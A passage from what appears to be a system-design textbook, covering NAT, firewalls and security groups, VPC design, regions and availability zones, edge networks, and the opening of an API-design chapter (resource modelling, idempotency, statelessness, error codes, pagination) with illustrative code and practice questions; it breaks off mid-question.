# A fleet behind one NAT gateway, all calling the SAME external API endpoint,
# shares that space. (AWS NAT Gateway: ~55,000 concurrent connections per
# unique destination; add more IPs or endpoints to scale past it.)
concurrent_per_instance = 200
instances = 300
print(concurrent_per_instance * instances) # 60000 -> exceeds the budget
# Symptom: "connection timed out" to one specific third party while everything
# else works. Fixes: connection pooling and keep-alive (fewer, longer-lived
# connections), multiple NAT gateway IPs, or a VPC endpoint that bypasses NAT.
Three consequences worth carrying into designs:
- NAT breaks inbound connections, which is why P2P needs hole punching and why servers live on public subnets or behind load balancers.
- NAT is stateful, so it is a bottleneck and a failure domain: its table has a size limit, its entries have idle timeouts (a long-lived idle connection can be silently dropped), and failing over loses all mappings.
- NAT costs money in the cloud, billed per hour and per gigabyte processed. Routing traffic to cloud services through VPC endpoints instead of a NAT gateway is a common and substantial cost saving.
Key Takeaways
- NAT lets many private hosts share few public addresses by rewriting addresses and ports.
- SNAT handles outbound traffic; DNAT (port forwarding) directs inbound traffic to internal hosts.
- NAT is stateful: table size, idle timeouts, and port exhaustion are real production limits.
- NAT prevents unsolicited inbound connections, and in cloud environments it is a metered, billable component.
🧪 Practice
- Explain why two devices on the same home network can both browse the web despite sharing one public IP.
- Your service intermittently fails to reach one third-party API but reaches others fine. Give two NAT-related explanations.
- Interview: Why can't you initiate a connection to a laptop behind a home router, and how do video-call applications work around it? (Hint: both sides must send outbound first, and something must coordinate the timing.)
Firewalls and Security Groups
Every open port is an invitation. A firewall enforces the principle that nothing should be reachable unless there is a reason for it — default deny, allow by exception. This is the cheapest security control that exists: it costs nothing at run time and eliminates entire attack classes by making vulnerable services unreachable in the first place.
Firewalls filter on the properties they can see at their layer: source and destination address, port, and protocol (layer 3/4), or HTTP semantics like paths, headers, and payloads (layer 7, a web application firewall).
The critical distinction is stateful versus stateless. A stateful firewall remembers connections: if it allowed your outbound request, it automatically allows the reply. A stateless one evaluates every packet in isolation, so you must write rules for both directions — and forgetting the return rule is the classic reason "my rules look right but nothing works".
LAYERED FILTERING IN A CLOUD NETWORK
Internet
|
[ Network ACL ] stateless, subnet-wide, allow AND deny rules, ordered
| -> broad strokes: block a hostile CIDR entirely
[ Security group ] stateful, per-instance, ALLOW rules only
| -> "web tier may receive 443 from anywhere"
[ Host firewall ] stateful, per-OS (iptables/nftables)
| -> defense in depth on the machine itself
[ Application ] authn/authz — the last and most important gate
# Stateful (iptables): one rule for established traffic covers all replies.
iptables -P INPUT DROP # default deny
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT # replies OK
iptables -A INPUT -p tcp --dport 443 -j ACCEPT # public HTTPS
iptables -A INPUT -p tcp --dport 22 -s 10.0.0.0/8 -j ACCEPT # SSH from VPC only
# Cloud security groups: reference other groups, not IP ranges. The app tier
# is reachable only from the web tier, whatever its addresses become.
resource "aws_security_group" "app" {
name = "app-tier"
ingress {
from_port = 8080
to_port = 8080
protocol = "tcp"
security_groups = [aws_security_group.web.id] # identity, not addresses
}
egress {
from_port = 5432
to_port = 5432
protocol = "tcp"
security_groups = [aws_security_group.db.id] # restrict egress too:
} # limits data exfiltration
}
| Control | Layer | Stateful | Scope | Rules |
|---|---|---|---|---|
| Network ACL | 3/4 | No | Subnet | Allow and deny, ordered |
| Security group | 3/4 | Yes | Instance/ENI | Allow only |
| Host firewall | 3/4 | Yes | One machine | Allow and deny |
| Web application firewall | 7 | Yes | Application | Pattern-based (SQLi, XSS, bots) |
Referencing security groups by identity rather than by IP range is the single most valuable habit here: it survives autoscaling, instance replacement, and address changes, and it expresses the intent ("the app tier trusts the web tier") rather than an accident of addressing.
Key Takeaways
- Default deny, allow by exception; unreachable services cannot be exploited.
- Stateful firewalls auto-allow replies; stateless ones need explicit rules in both directions.
- Layer controls: subnet ACLs, instance security groups, host firewalls, then application authorization.
- Reference security groups by identity rather than IP so rules survive scaling.
🧪 Practice
- Write the security group rules for a three-tier app (web, app, database) where each tier only accepts traffic from the one above it.
- Explain why a stateless ACL that allows inbound 443 still breaks HTTPS unless you add another rule, and what that rule is.
- Interview: Why restrict outbound traffic when the threat is inbound? (Hint: think about what an attacker does after gaining a foothold.)
Virtual Private Cloud Design
A VPC is your own logically isolated network inside a shared cloud. It exists so that "which machines can talk to which" is a decision you make explicitly, rather than an accident of who happens to know an IP address. Nearly every security and connectivity property of a cloud system traces back to the VPC layout.
The core structure is simple: a VPC owns a CIDR block, and it is divided into subnets, each living in exactly one availability zone. A subnet's route table determines whether it is public (a route to an internet gateway) or private (no such route; outbound traffic goes through a NAT gateway instead).
STANDARD THREE-TIER VPC (10.0.0.0/16), TWO AZs
+----------------------- VPC 10.0.0.0/16 ------------------------+
| |
| AZ-a AZ-b |
| +---------------------+ +---------------------+ |
| | public 10.0.0.0/24 | | public 10.0.1.0/24 | |
| | [ALB] [NAT gw] | | [ALB] [NAT gw] | <- IGW route
| +---------------------+ +---------------------+ |
| | private 10.0.10.0/24| | private 10.0.11.0/24| |
| | [app] [app] | | [app] [app] | <- NAT route
| +---------------------+ +---------------------+ |
| | data 10.0.20.0/24| | data 10.0.21.0/24| |
| | [db primary] | | [db standby] | <- no internet
| +---------------------+ +---------------------+ |
+----------------------------------------------------------------+
Only the public subnets are reachable from the internet. Everything that
holds data sits two layers deep with no route out at all.
# Deriving a VPC plan from capacity estimates, not from habit.
import ipaddress
vpc = ipaddress.ip_network("10.20.0.0/16") # one /16 per region+environment
tiers = {"public": 24, "private": 22, "data": 24} # private is largest: most pods
azs = ("a", "b", "c")
# Reserve a distinct /20 slice per AZ so tiers can grow without collisions.
for az, block in zip(azs, vpc.subnets(new_prefix=20)):
print(az, block)
# a 10.20.0.0/20 b 10.20.16.0/20 c 10.20.32.0/20
# Half the /16 is deliberately left unallocated for future tiers and
# for workloads (like Kubernetes pods) that consume addresses fast.
The decisions that matter most, in order of how expensive they are to reverse:
| Decision | Why it is hard to change later |
|---|---|
| VPC CIDR range | Overlaps block all future peering; re-addressing is an outage-level migration |
| Subnet sizing per tier | Growing a subnet is not possible; you add new ones and rebalance |
| Public vs. private placement | Moving a database to a private subnet changes every connection path |
| Cross-VPC connectivity | Peering does not transit; a hub-and-spoke (transit gateway) retrofit touches every route table |
Two patterns are worth knowing by name. VPC endpoints let instances in a private subnet reach cloud services (object storage, queues) over the provider's internal network — no NAT gateway, no internet exposure, lower cost. And hub-and-spoke connectivity (a transit gateway) replaces the mesh of pairwise peerings that becomes unmanageable past a handful of VPCs, because peering connections are not transitive.
Key Takeaways
- A VPC is an isolated network; subnets are AZ-scoped and public or private by route table, not by name.
- Put anything holding data in private subnets with no route to the internet.
- CIDR planning is effectively irreversible — allocate generously and never overlap.
- VPC endpoints avoid NAT costs and exposure; transit gateways replace non-transitive peering meshes.
🧪 Practice
- Design a VPC for a two-region, three-AZ deployment with public, private, and data tiers, and state every CIDR.
- Explain the traffic path for an instance in a private subnet calling an external payment API, naming every component it traverses.
- Interview: Your database is in a public subnet with a security group allowing only the app tier. Is that acceptable? (Hint: consider defense in depth and what a single misconfigured rule would then expose.)
Regions and Availability Zones
Cloud providers give you two units of geography, and confusing them is a common and expensive mistake. An availability zone (AZ) is one or more datacenters with independent power, cooling, and networking, close enough to its siblings for sub-millisecond links. A region is a cluster of AZs in one geographic area, far from other regions.
The distinction exists because two different problems need two different solutions. AZs protect against facility failure — a fire, a flood, a power loss — while keeping latency low enough that synchronous replication is practical. Regions protect against regional disaster and put data close to users, but they are far enough apart that synchronous coordination is painful.
GEOGRAPHY AND LATENCY
REGION eu-west-1 REGION us-east-1
+---------------------------+ +---------------------------+
| AZ-a <--0.5-2 ms--> AZ-b| | AZ-a AZ-b AZ-c |
| \ / | | |
| \--- AZ-c ---------/ | | |
+---------------------------+ +---------------------------+
\_________________ ~70-80 ms ________________/
Within an AZ: ~0.1-0.5 ms -> anything goes
Across AZs: ~0.5-2 ms -> synchronous replication is fine
Across regions: ~30-250 ms -> synchronous writes are painful
(every commit pays a full round trip)
# The multi-AZ vs multi-region decision expressed as consequences.
TOPOLOGIES = {
"single-az": {"survives": "instance failure",
"availability": 0.99, "extra_cost": 1.0, "write_ms": 2},
"multi-az": {"survives": "datacenter failure",
"availability": 0.9995, "extra_cost": 2.0, "write_ms": 4},
"multi-region-active-passive": {"survives": "regional disaster",
"availability": 0.9999, "extra_cost": 2.4, "write_ms": 4},
"multi-region-active-active": {"survives": "regional disaster + serves locally",
"availability": 0.99999,"extra_cost": 3.0, "write_ms": 80},
}
for name, t in TOPOLOGIES.items():
print(f"{name:28} {t['availability']:<8} {t['extra_cost']}x writes {t['write_ms']}ms")
# The pattern: multi-AZ is cheap insurance almost everyone should buy.
# Multi-region is expensive and forces a consistency decision — either
# asynchronous replication (accept data loss on failover, an RPO > 0) or
# synchronous writes (accept cross-region latency on every commit).
| Concern | Multi-AZ | Multi-region |
|---|---|---|
| Protects against | Datacenter loss | Regional disaster, geographic latency |
| Replication | Synchronous is practical | Usually asynchronous (RPO > 0) |
| Failover complexity | Low; often automatic | High; DNS/global routing, data reconciliation |
| Data transfer cost | Small per-GB charge | Significantly higher |
| Compliance angle | Neutral | Enables data residency requirements |
| When to adopt | Almost always | When downtime cost or user geography justifies it |
Two practical notes. Spread across at least three AZs when quorum systems are involved, because a quorum of three survives losing one while two cannot. And cross-AZ traffic is billed per gigabyte — a chatty service accidentally talking across AZs on every request produces a surprising bill and extra latency, which is why AZ-aware routing exists.
Key Takeaways
- AZs are independent facilities within a region, ~0.5-2 ms apart; cross-region is tens to hundreds of ms.
- Multi-AZ is affordable protection against datacenter failure and supports synchronous replication.
- Multi-region protects against regional disaster and serves users locally, at high complexity and cost.
- Use three AZs for quorum systems, and watch cross-AZ data transfer charges.
🧪 Practice
- Explain why a quorum-based database needs three AZs rather than two.
- A synchronous write requires acknowledgement from a replica 80 ms away. What is the maximum sequential write throughput per connection?
- Interview: When is multi-region worth its cost? (Hint: quantify downtime cost per hour and user-perceived latency, and compare with the added engineering and infrastructure spend.)
Edge Networks
Physics is the one constraint no code can optimize away: a round trip to a server 10,000 km distant cannot beat roughly 100 ms. If your users are global and your origin is in one region, most of their latency is spent in transit. Edge networks solve this by putting servers close to users — hundreds of points of presence (PoPs) worldwide that terminate connections, serve cached content, and forward what they cannot answer.
The gain is larger than "one round trip saved", because connection setup is multi-round-trip. Terminating TCP and TLS at a PoP 10 ms away instead of an origin 150 ms away turns a ~450 ms setup into ~30 ms, and the PoP holds a warm, pre-established connection to the origin.
WITHOUT EDGE WITH EDGE
[User in Sydney] [User in Sydney]
| 150 ms RTT | 10 ms RTT to Sydney PoP
| x3 (TCP + TLS + request) | x3 = 30 ms
v v
[Origin in Virginia] [Edge PoP] --warm, pooled connection-->
[Origin in Virginia]
~450 ms to first byte cache hit: ~10 ms
cache miss: ~180 ms (still faster: the
handshakes are already done)
Anycast is what makes this work without client-side logic: the same IP address is announced from every PoP, and internet routing delivers each user to the topologically nearest one automatically.
# What the edge caches is controlled entirely by origin response headers.
HTTP/1.1 200 OK
Cache-Control: public, max-age=60, s-maxage=86400, stale-while-revalidate=600
# ^public ^browser ^shared cache ^serve stale while refreshing
# 60s 24h at the edge
Vary: Accept-Encoding
# ^ cache separate variants; a careless Vary (on User-Agent) destroys hit rate
ETag: "a3f9c2"
# ^ enables cheap revalidation: the origin can answer 304 Not Modified
// Edge functions run the same request-handling code at every PoP, which lets
// personalization and routing happen without a trip to the origin.
export default async function handler(request) {
const country = request.headers.get("cf-ipcountry") ?? "US"; // set by the PoP
// Redirect at the edge: ~10 ms instead of a 150 ms round trip to origin.
if (country === "DE" && !request.url.includes("/de/")) {
return Response.redirect(new URL("/de/", request.url), 302);
}
// A/B assignment at the edge keeps the cached page identical for everyone
// in a bucket, preserving the cache hit rate.
const bucket = hash(request.headers.get("cookie")) % 2 ? "a" : "b";
return fetch(originURL, { headers: { "x-bucket": bucket } });
}
| Edge capability | What it removes |
|---|---|
| Static caching | Origin requests entirely for hot assets |
| TLS termination | Multiple long round trips from the setup path |
| Connection pooling to origin | Handshake cost on every cache miss |
| DDoS absorption | Attack traffic, filtered before it reaches origin |
| Edge compute | Round trips for redirects, auth checks, A/B splits |
| Image/video optimization | Bytes transferred to the client |
The main design constraint is cache correctness: anything user-specific must either not be cached or be varied on the right key. The typical pattern is to cache the shell aggressively at the edge and fetch personalized fragments separately — which keeps hit rates high without ever serving one user's data to another.
Key Takeaways
- Edge PoPs cut latency by terminating connections physically near users.
- The saving is multiplied because handshakes cost several round trips.
- Anycast routes users to the nearest PoP with no client-side logic.
- Cache behaviour is driven by origin headers; a careless
Varyor an uncached personalized response destroys the benefit.
🧪 Practice
- Compute time-to-first-byte for a user 150 ms from origin versus 10 ms from a PoP, counting TCP and TLS 1.3 handshakes in both cases.
- Write
Cache-Controlheaders for: a hashed JS bundle, a news homepage, a logged-in user's dashboard.- Interview: How would you serve personalized content without destroying the edge cache hit rate? (Hint: split what varies from what does not, and consider what can be decided at the edge itself.)
Chapter Summary
| Concept | The one-line version |
|---|---|
| Four resources | CPU, memory, disk, network; whichever saturates first is your capacity |
| Latency ladder | Memory ~100 ns, SSD ~16 us, in-DC RTT ~0.5 ms, cross-ocean ~250 ms |
| Sequential vs. random | Sequential wins by ~200x on HDD, ~6-8x on SSD; storage engines exploit it |
| Platforms | Bare metal, VM, container trade isolation against density and boot speed |
| Vertical limits | Descriptors, ephemeral ports, threads, and pools bite before CPU does |
| Layering | Each layer wraps the one above; a device sees only its own layer |
| TCP vs. UDP | Reliability and ordering with head-of-line blocking, versus raw speed |
| CIDR | Prefix length sets block size; overlapping ranges can never be peered |
| DNS | Hierarchical and cached; TTL trades failover speed against latency |
| TLS | Confidentiality, integrity, authentication; 1 RTT in TLS 1.3 |
| HTTP versions | Same semantics; H2 removes app-level and H3 removes transport-level HOL blocking |
| Sync vs. async | Sync multiplies availabilities and propagates latency; async decouples both |
| Push techniques | Short poll, long poll, SSE (one-way), WebSockets (duplex, stateful) |
| Proxies | Forward proxies act for clients; reverse proxies act for servers |
| NAT | Address sharing with a stateful table — a real capacity and cost limit |
| Firewalls | Default deny; stateful groups referenced by identity, layered in depth |
| VPC | Subnets are public or private by route table; CIDR choices are permanent |
| AZs and regions | AZs are ms apart (sync replication); regions are tens to hundreds of ms |
| Edge | Terminate near the user; the win is several round trips, not just one |
<a id="3-apis-and-service-interfaces"></a>
3. APIs and Service Interfaces
An API is the contract between a service and everyone who depends on it, and unlike internal code it cannot be quietly refactored once other teams rely on it. This chapter covers the principles that make an interface predictable, the styles available for expressing it, the lifecycle work of evolving it without breaking clients, and the edge infrastructure that fronts it in production.
<a id="31-api-design-principles"></a>
3.1 API Design Principles
These principles apply regardless of style — REST, GraphQL, or gRPC — because they concern how an interface behaves under the realities of networks, retries, and growth.
Resource Modeling
The hardest part of API design is deciding what the API is about. A poorly modelled API grows one bespoke endpoint per feature until nobody can predict what exists; a well-modelled one lets a developer guess the URL correctly on the first try. The difference is whether the design is organized around nouns that exist in the domain or around the verbs a particular screen happened to need.
A resource is a thing worth naming and addressing: an order, a user, a
subscription. Once you have identified resources, the operations mostly fall out
of the protocol — HTTP already supplies create, read, update, and delete, so you
do not invent createOrder, getOrder, and cancelOrderV2.
The analogy is a filing cabinet versus a to-do list. A filing cabinet is organized by what things are, so anyone can find a document without being told where it went. A to-do list is organized by what someone wanted to do that week, and it makes sense only to its author.
VERB-ORIENTED (grows without bound) RESOURCE-ORIENTED (predictable)
POST /createOrder POST /orders
POST /getOrderById GET /orders/{id}
POST /cancelOrder DELETE /orders/{id}
POST /getOrdersForUser GET /users/{id}/orders
POST /addItemToOrder POST /orders/{id}/items
POST /updateOrderShippingAddress PATCH /orders/{id}
POST /getOrderInvoicePdf GET /orders/{id}/invoice
7 endpoints, 7 conventions to learn 4 nouns, 1 convention to learn
Naming conventions that carry their weight:
- Plural nouns for collections (
/orders, not/order), so a collection and a member read differently:/ordersversus/orders/42. - Nesting expresses containment, not navigation.
/orders/42/itemsis fine because items belong to the order./users/7/orders/42/items/9/productis not — stop nesting once the child has its own identity. - No verbs in paths. The method is the verb.
- Lowercase, hyphenated for multi-word names:
/shipping-addresses.
The awkward cases are actions that are not really CRUD: "cancel", "publish", "retry", "send". Two legitimate answers exist, and both are better than inventing a verb endpoint.
### Option A: model the state change as a field update
PATCH /orders/42
Content-Type: application/json
{"status": "cancelled"}
# Good when the action is genuinely just a state transition and the client
# is allowed to set that state directly.
### Option B: model the action itself as a subordinate resource
POST /orders/42/cancellations
Content-Type: application/json
{"reason": "customer_request"}
# Good when the action has its own data, can happen more than once, needs an
# audit trail, or has side effects beyond changing one field. You now have
# something addressable: GET /orders/42/cancellations/1
# Resource modelling shows up directly in the routing table. If the table is
# readable, the API is discoverable.
routes = [
("POST", "/orders", create_order),
("GET", "/orders", list_orders), # filtered/paged
("GET", "/orders/{order_id}", get_order),
("PATCH", "/orders/{order_id}", update_order), # partial update
("DELETE", "/orders/{order_id}", cancel_order),
("GET", "/orders/{order_id}/items", list_order_items), # containment
("POST", "/orders/{order_id}/items", add_order_item),
]
# A new engineer can predict every one of these without reading the docs.
# That predictability is the entire return on resource modelling.
| Symptom | Underlying modelling problem |
|---|---|
| Endpoint count grows with every UI change | Modelled around screens, not domain nouns |
Verbs in the path (/getUser) | Ignoring HTTP methods |
| Deeply nested URLs (4+ levels) | Nesting used for navigation, not containment |
| Same data returned by five endpoints | No canonical resource identified |
| Clients call 6 endpoints to render a page | Resources too granular for the use case |
Key Takeaways
- Model the API around domain nouns; let HTTP methods supply the verbs.
- Plural collection names, containment-only nesting, no verbs in paths.
- Non-CRUD actions become either a state field update or a subordinate resource.
- Predictability is the goal: a developer should guess the URL correctly without the docs.
🧪 Practice
- Redesign these as resource-oriented endpoints:
POST /searchUsers,POST /markNotificationRead,GET /getUserSubscriptionStatus.- Model an API for a library system with books, copies, members, and loans. Decide which relationships justify nesting.
- Interview: How would you model "send a password reset email" as a resource? (Hint: the action produces something with its own lifetime and identity — name that thing.)
Idempotency
Networks fail in an especially nasty way: the request succeeded but the response was lost. From the client's side that is indistinguishable from the request never arriving, so the client retries — and if the operation is not idempotent, the customer is charged twice. Idempotency is the property that makes retrying safe, and retrying is unavoidable in any distributed system.
An operation is idempotent if performing it once and performing it many
times leave the system in the same state. Note the definition is about state,
not about the response: returning 409 Conflict on a duplicate is still
idempotent behaviour if the state changed only once.
The analogy is a light switch versus a doorbell. Pressing "set switch to on" five times leaves one light on. Pressing a doorbell five times rings it five times.
THE AMBIGUOUS FAILURE
Client Server
|--- POST /payments -------->|
| | charge succeeds, state written
| X response lost |
| |
| ??? Did it work ??? |
| |
|--- POST /payments (retry)->| <- without idempotency: charged twice
with idempotency: recognized, replayed
HTTP defines which methods are expected to be idempotent, and clients,
proxies, and libraries rely on it — an HTTP client will happily auto-retry a
GET or PUT but should never auto-retry a POST.
| Method | Safe (no change) | Idempotent | Notes |
|---|---|---|---|
GET | Yes | Yes | Never use it to mutate state |
HEAD | Yes | Yes | Headers only |
PUT | No | Yes | Replaces the whole resource |
DELETE | No | Yes | Deleting twice leaves it deleted |
POST | No | No | The reason idempotency keys exist |
PATCH | No | Not inherently | {"count": 5} is; {"count": "+1"} is not |
For POST, the standard technique is an idempotency key: the client
generates a unique value per logical operation and resends the same key on
every retry. The server records the key with the outcome and replays that
outcome instead of acting again.
def create_payment(request, db, gateway):
key = request.headers.get("Idempotency-Key")
if not key:
return error(400, "Idempotency-Key header is required")
# Atomic claim: INSERT fails if the key already exists. Checking first and
# then inserting is a race — two concurrent retries would both pass.
try:
db.execute(
"INSERT INTO idempotency (key, request_hash, status) VALUES (%s,%s,'IN_PROGRESS')",
(key, hash_body(request.body)),
)
except UniqueViolation:
row = db.fetch_one("SELECT * FROM idempotency WHERE key = %s", (key,))
if row.request_hash != hash_body(request.body):
# Same key, different payload: the client has a bug. Refuse loudly.
return error(422, "Idempotency-Key reused with a different body")
if row.status == "IN_PROGRESS":
return error(409, "Request already in progress; retry shortly")
return replay(row.response) # identical response, no second charge
result = gateway.charge(request.body) # the real side effect, exactly once
db.execute("UPDATE idempotency SET status='DONE', response=%s WHERE key=%s",
(serialize(result), key))
return result
Two design notes. Keys need a retention window — 24 hours is typical, long enough to cover client retries without growing the table forever. And the key must be generated by the client per logical operation, not per HTTP attempt: a key regenerated on each retry provides no protection at all.
Key Takeaways
- Retries are inevitable because a lost response is indistinguishable from a lost request.
- Idempotency is about resulting state, not about returning an identical response.
GET,PUT,DELETEare idempotent by contract;POSTneeds an idempotency key.- Claim the key atomically, store the outcome, replay it, and expire keys after a bounded window.
🧪 Practice
- Classify as idempotent or not:
PUT /users/7 {"name":"Ada"},POST /orders/7/items,DELETE /sessions/abc, "increment view count".- Design the idempotency table: columns, primary key, TTL strategy, and what happens on a concurrent duplicate.
- Interview: A client retries with the same idempotency key but a different request body. What should the API do and why? (Hint: consider which is more dangerous — silently honouring the first body, or the second.)
Statelessness
If a server remembers something about a client between requests, that client is now tied to that server. Losing the instance loses the state, a load balancer must keep routing them together, and you cannot scale in or deploy without disruption. Statelessness is the discipline of making every request carry everything needed to process it, which is what makes horizontal scaling and zero-downtime deploys straightforward.
Stateless does not mean the system has no state — it means the server process holds none between requests. The state moves somewhere designed to hold it: a database, a shared cache, or the request itself in the form of a signed token.
The analogy is a supermarket checkout versus a personal tailor. Any cashier can serve any customer because everything needed is on the conveyor belt. A tailor remembers your measurements, so you must return to the same one.
STATEFUL (sticky) STATELESS
[client A] --> [srv 1] memory: A [client A] --\
[client B] --> [srv 2] memory: B [client B] ---> [LB] --> [any srv]
|
srv 1 dies -> A is logged out v
scale in -> sessions lost [Redis / DB / token]
deploy -> everyone disrupted any server serves any request
# Stateful: correctness depends on which instance answers.
UPLOAD_PROGRESS = {} # process memory
def upload_chunk_stateful(session_id, chunk):
UPLOAD_PROGRESS.setdefault(session_id, []).append(chunk) # lost on restart
# A retry routed to another instance sees an empty list and corrupts the file.
# Stateless: the request identifies everything; state lives in shared storage.
def upload_chunk_stateless(upload_id, chunk_number, chunk, store, db):
store.put(f"uploads/{upload_id}/{chunk_number}", chunk) # shared object store
db.execute("INSERT INTO upload_chunks (upload_id, n) VALUES (%s,%s) "
"ON CONFLICT DO NOTHING", (upload_id, chunk_number)) # idempotent
return {"received": chunk_number}
# Any instance can serve any chunk, in any order, with retries.
Where to put the state is itself a trade-off:
| Approach | Pros | Cons |
|---|---|---|
| Shared cache (Redis) session | Revocable instantly; small cookies | An extra network hop and a dependency |
| Signed token (JWT) in the client | No server lookup; scales trivially | Cannot revoke before expiry; size limits; leaks if stored badly |
| Database | Durable, queryable | Slowest; adds load to the primary store |
| Sticky sessions | No code changes | Uneven load, lost sessions, painful deploys |
Statelessness has limits worth naming. WebSocket connections are inherently pinned to an instance (Chapter 2), and caching per-instance is a deliberate, useful form of state. The rule is not "never hold state" but "never hold state whose loss breaks correctness".
Key Takeaways
- Stateless servers let any instance serve any request, enabling scaling and safe deploys.
- State moves to a shared store or into a signed token carried by the client.
- Sticky sessions are a workaround with real costs: uneven load and disruptive deploys.
- The rule is not zero state — it is no state whose loss breaks correctness.
🧪 Practice
- Identify the state in a multi-step checkout wizard and decide where each piece should live.
- Compare Redis-backed sessions with JWTs for an app that must support immediate logout across devices.
- Interview: Your API server caches user permissions in memory for 5 minutes. Is it still stateless? (Hint: ask what breaks if that cache vanishes versus what breaks if a session store vanishes.)
Error Handling and Status Codes
Errors are part of the API contract, not an afterthought. Clients need to
answer three questions from a failure: was it my fault or yours?, should I
retry?, and what exactly do I tell the user? An API that returns 200 OK
with {"error": "..."} in the body answers none of them and defeats every
proxy, monitor, and HTTP client in the path.
HTTP already encodes the first two answers in the status code, and the classes matter more than the individual numbers.
| Class | Meaning | Client should retry? |
|---|---|---|
2xx | Success | n/a |
3xx | Redirection | Follow it |
4xx | Client error | No — the same request will fail again |
5xx | Server error | Yes, with backoff |
CHOOSING A 4xx
400 Bad Request malformed syntax, unparseable body
401 Unauthorized not authenticated (you are nobody) <- misnamed
403 Forbidden authenticated but not permitted (you are somebody,
just not the right somebody)
404 Not Found no such resource — or hiding one you may not see
405 Method Not Allowed right path, wrong verb
409 Conflict state conflict: duplicate, version mismatch
410 Gone it existed and is permanently removed
422 Unprocessable syntactically valid, semantically wrong
429 Too Many Requests rate limited; pair with Retry-After
CHOOSING A 5xx
500 Internal Error unhandled — a bug; never leak the stack trace
502 Bad Gateway an upstream returned garbage
503 Service Unavailable overloaded or in maintenance; pair with Retry-After
504 Gateway Timeout an upstream did not answer in time
The status code is the machine-readable half. The body carries the rest, and standardizing its shape (RFC 9457, "Problem Details") saves every client from writing a bespoke parser.
HTTP/1.1 422 Unprocessable Content
Content-Type: application/problem+json
{
"type": "https://api.example.com/problems/validation-error",
"title": "Validation failed",
"status": 422,
"detail": "The order could not be created because 2 fields are invalid.",
"instance": "/orders",
"trace_id": "01HQ8X4M2N",
"errors": [
{"field": "quantity", "code": "min_value", "message": "must be at least 1"},
{"field": "currency", "code": "unsupported", "message": "'XBT' is not supported"}
]
}
# A stable error contract: machine-readable code, human-readable message,
# and a trace id that ties the client's report to your logs.
class ApiError(Exception):
def __init__(self, status, code, message, retryable=False, **extra):
self.status, self.code = status, code
self.message, self.retryable = message, retryable
self.extra = extra
def handle(exc, trace_id):
if isinstance(exc, ApiError):
body = {"code": exc.code, "message": exc.message,
"retryable": exc.retryable, "trace_id": trace_id, **exc.extra}
return response(exc.status, body)
# Never let an unexpected exception leak internals to the caller: the
# message may contain SQL, file paths, or credentials.
log.exception("unhandled", trace_id=trace_id)
return response(500, {"code": "internal_error",
"message": "An unexpected error occurred.",
"retryable": True, "trace_id": trace_id})
Three rules that prevent most client-side pain: stable machine-readable
codes (insufficient_funds never changes, even when the sentence does),
never leak internals in messages, and say when to retry — Retry-After
on 429 and 503 turns guesswork into cooperation.
Key Takeaways
- The status class tells the client whose fault it is and whether retrying can help;
4xxno,5xxyes.- Never return
200with an error body — it breaks proxies, monitoring, and client libraries.- Provide a stable machine-readable code plus a human message and a trace id.
- Send
Retry-Afterwith429and503, and never leak stack traces.
🧪 Practice
- Pick status codes for: expired auth token, deleting an already-deleted order, quantity of -5, downstream payment provider timeout, unsupported
Acceptheader.- Design the error body for a bulk endpoint where 3 of 100 items failed. Which status code applies?
- Interview: When would you return
404instead of403for a resource the caller may not access? (Hint: consider what the difference between the two responses tells an attacker.)
Pagination Strategies
Any collection that can grow must be paginated. Returning 2 million rows kills
the server's memory, the network, and the client, and adding LIMIT later is a
breaking change — so pagination is designed in from the first version, even
when the table has ten rows.
There are two mainstream approaches, and the difference between them is one of the most commonly missed points in API design.
Offset pagination (?page=3&limit=20) is the familiar one: skip N rows,
take M. It is simple, allows jumping to an arbitrary page, and shows total
counts. It has two serious flaws at scale. OFFSET 100000 forces the database
to scan and discard 100,000 rows, so deep pages get progressively slower. And
because it addresses positions rather than items, concurrent inserts and
deletes shift the window — items get skipped or repeated across pages.
Cursor (keyset) pagination addresses the last item seen instead: "give me 20 items after this one". The query becomes an indexed range scan with constant cost regardless of depth, and it is stable under concurrent writes.
THE OFFSET DRIFT BUG
t=0 page 1: LIMIT 3 OFFSET 0 -> [ I10, I9, I8 ] (newest first)
t=1 a new item I11 is inserted
t=2 page 2: LIMIT 3 OFFSET 3 -> [ I8, I7, I6 ]
^^^ I8 seen twice, and nothing was
skipped only by luck; a deletion
would have skipped an item instead
CURSOR PAGINATION IS STABLE
page 1: WHERE id < MAX ORDER BY id DESC LIMIT 3 -> [I10, I9, I8], cursor=I8
page 2: WHERE id < I8 ORDER BY id DESC LIMIT 3 -> [I7, I6, I5]
inserts at the top do not disturb the window
import base64, json
# OFFSET: simple, but O(offset) work and unstable under writes.
def list_offset(db, page, limit):
rows = db.query("SELECT * FROM posts ORDER BY id DESC LIMIT %s OFFSET %s",
(limit, (page - 1) * limit))
total = db.scalar("SELECT count(*) FROM posts") # itself expensive at scale
return {"items": rows, "page": page, "total": total}
# CURSOR: constant cost, stable ordering. The cursor is opaque on purpose so
# you can change its internals without breaking clients.
def encode_cursor(row):
return base64.urlsafe_b64encode(
json.dumps({"id": row.id, "created_at": row.created_at.isoformat()}).encode()
).decode()
def list_cursor(db, cursor=None, limit=20):
if cursor:
c = json.loads(base64.urlsafe_b64decode(cursor))
# Compare the full sort key, not just the timestamp: ties on created_at
# would otherwise skip or repeat rows.
rows = db.query(
"SELECT * FROM posts WHERE (created_at, id) < (%s, %s) "
"ORDER BY created_at DESC, id DESC LIMIT %s",
(c["created_at"], c["id"], limit + 1)) # fetch one extra
else:
rows = db.query("SELECT * FROM posts ORDER BY created_at DESC, id DESC "
"LIMIT %s", (limit + 1,))
has_more = len(rows) > limit # the extra row tells us
rows = rows[:limit]
return {"items": rows,
"next_cursor": encode_cursor(rows[-1]) if has_more and rows else None}
| Aspect | Offset | Cursor |
|---|---|---|
| Deep-page performance | Degrades linearly | Constant |
| Stability under writes | Items skipped/duplicated | Stable |
| Jump to arbitrary page | Yes | No |
| Total count available | Yes (at a cost) | Usually not |
| Sort flexibility | Any column | Sort key must be in the cursor and indexed |
| Best for | Small, admin-style tables | Feeds, timelines, large collections |
Rule of thumb: cursor pagination for anything user-facing or unbounded;
offset only where page numbers are a genuine requirement and the table is
small. Always enforce a maximum page size server-side — otherwise
?limit=1000000 becomes a denial-of-service vector.
Key Takeaways
- Design pagination in from v1; adding limits later is a breaking change.
- Offset pagination degrades with depth and drifts when the data changes.
- Cursor pagination is constant-cost and stable; the cursor must encode the full sort key.
- Make cursors opaque and always cap page size on the server.
🧪 Practice
- Explain concretely how a user could miss an item while scrolling an offset-paginated feed during active posting.
- Write the cursor payload and SQL predicate for sorting by
